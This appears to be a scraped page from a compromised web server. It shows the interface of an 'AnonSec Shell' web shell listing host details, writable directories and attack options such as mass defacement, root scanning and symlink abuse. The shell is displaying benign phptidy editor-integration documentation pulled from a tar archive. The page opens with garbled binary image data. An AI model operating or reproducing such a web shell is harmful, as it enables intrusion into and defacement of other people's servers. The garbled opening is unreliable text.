JFIFHHCnxxdC"&!1A2Q"aqBb1 ?R{~,.Y|@sl_޸s[+6ϵG};?2Y`&9LP?3rj  "@V]:3T-G*P ( *(@AEY]qqqALn+Wtu?)lQUT*Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ηnu ڶh%(Lvũbb-?M֍݌٥IHln㏷L(69L^"6Pd&1H&8@TUTCJ%eʹFTj4i5=0g J&Wc+3kU@PS@HH33M *"Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePPd\A2glo=WL(6^;k"ucoH"b ,PDVlvL_/:̗rN\mdcw T-O$w+FZ5T *Y~l:99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~YИ3M3@E)GTg%AnpPMUҀhԳW c֦iZ ffR 7qMcyAZTc0bZU k+oG<]APQTA={PDti@c>>KÚ"qL.1Pk6QY7t.k7o<P &yַܼJZyWz{UrS@~P)Y:A"]Y&ScVO%17 6l4i4YR5ruk*ؼdZͨZZ cLakb3N6æ\1`XTloTuTAA 7Uq@2ŬzoʼnБRͪ&8}:e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt"(.=Y:V#'H:δ4#6yjѥBB ;WD-ElFf67*\AmADQ__'2$TX9nu'm@iPDTqS`%u%3[nY, :g = tiXH]ij"+6Z* .~|05s6 ,ǡogm+KtE-BF ES@(UJxM~8%g/=Vw[Vh3lJT rK -kˎYٰ,ukͱٵf sXDP]p]&MS95O+j&f6m463@t8ЕX=6}HR5ٶ06/@嚵*6  "hP@eVDiYQT`7tLf4c?m//B4 lajL} :Eb#PHQb,yN`rkAb^ |}s4XB4*,@[{Ru+%le2}`,kI$U`>OMuhP% ʵ/ L\5aɕVN1R63}ZLj-Dl@*(K\^i@F@551k㫖hQ沬#h XV +;]6zOsFpiX$OQ )ųl4YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 162.19.86.63  /  Your IP : 216.73.217.81   [ Reverse IP ]
Web Server : Apache
System : Linux oirealestate.net 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : oinversion ( 10001)
PHP Version : 5.6.40
Disable Function : opcache_get_status
Domains : 5 Domains
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/oinversion.com/.trash/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/vhosts/oinversion.com/.trash/INTEGRATION.tar
var/www/vhosts/oinversion.com/httpdocs/vendor/cmrcx/phptidy/INTEGRATION000064400000004257151456547410022132 0ustar00====== Integration of phptidy into editors ======

Instead of running phptidy from command line, you can also integrate it into
your editor or IDE.

There are some possible approaches:

1) run phptidy on the whole project

  cd <project_path> && phptidy.php replace

2) run phptidy only on a single file

  Limitation: Since no other project files are read, no new see-tags will be
  added to docblocks.

2a) run phptidy on the file

  cd <project_path> && phptidy.php replace <file>

2b) let phptidy read from STDIN and write to STDOUT

  | phptidy.php --quiet - |

  Limitations:
  - Since there is no file name, new file docblocks won't get a file name.
  - If you want to use a config file, you either have to change to the project
    path first:

      | ( cd <project_path> && phptidy.php --quiet - ) |

    or specify the absolute path to the config file:

      | phptidy.php --quiet --config=/path/to/.phptidy-config.php - |


Some examples:

=== PhpStorm IDE ===

You can run phptidy on the whole project as an "external tool":

Settings/Preferences -> Tools -> External Tools -> +

Program:           phptidy.php
Parameters:        replace
Working directory: $ProjectFileDir$

In case phptidy.php can't be found in your PATH, you have to specify the
absolute path in the Program field. There also seems to be a known problem:
http://ify.io/getting-webstorm-external-tools-to-work-on-webstorm-on-osx/

=== VIM ===

You can run phptidy on the current buffer.

Install the vim autoformat addon:
https://github.com/Chiel92/vim-autoformat

Add the following lines to your ~/.vimrc file:

  let g:formatprg_php = "phptidy.php"
  let g:formatprg_args_php = "--quiet -"

If you want to use a config file, you can either change to the project path:

  let g:formatprg_php = "cd <project_path> && phptidy.php"

or specify the absolute path to the config file:

  let g:formatprg_php = "--quiet --config=/path/to/.phptidy-config.php -"

Unfortunately in both cases you will have to edit your ~/.vimrc to switch
between projects with different config files.

You should now be able to format an open PHP file using the following command:

  :Autoformat


Additional examples are welcome!

Magnus Rosenbaum <phptidy@cmr.cx>

Anon7 - 2022
AnonSec Team